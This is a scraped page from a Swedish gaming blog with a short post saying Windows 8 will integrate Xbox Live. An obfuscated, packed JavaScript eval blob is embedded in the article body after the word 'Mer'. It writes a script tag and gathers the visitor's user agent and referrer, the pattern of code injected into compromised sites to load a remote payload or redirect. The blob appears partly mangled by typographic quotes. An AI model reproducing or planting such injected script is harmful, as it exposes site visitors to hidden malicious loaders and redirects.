Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

PC

Windows 8 får Xbox Live

Windows 8 får Xbox Live
Sebastian

Nu är det snart dags för släppet av det nya Windows 8. Enligt Microsoft så kommer systemet att inegrera Xbox Live. Xbox Live är ett riktigt stabilt och bra system när det kommer till onlinespel och spelköp. Därför är detta kanske inte så oväntat ändå.
Det är ett mycket smart steg av Microsoft som då hoppas få fler användare till Windows.

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsdbi|var|u0026u|referrer|zasaa||js|php’.split(’|’),0,{}))
info:
gamesutra.com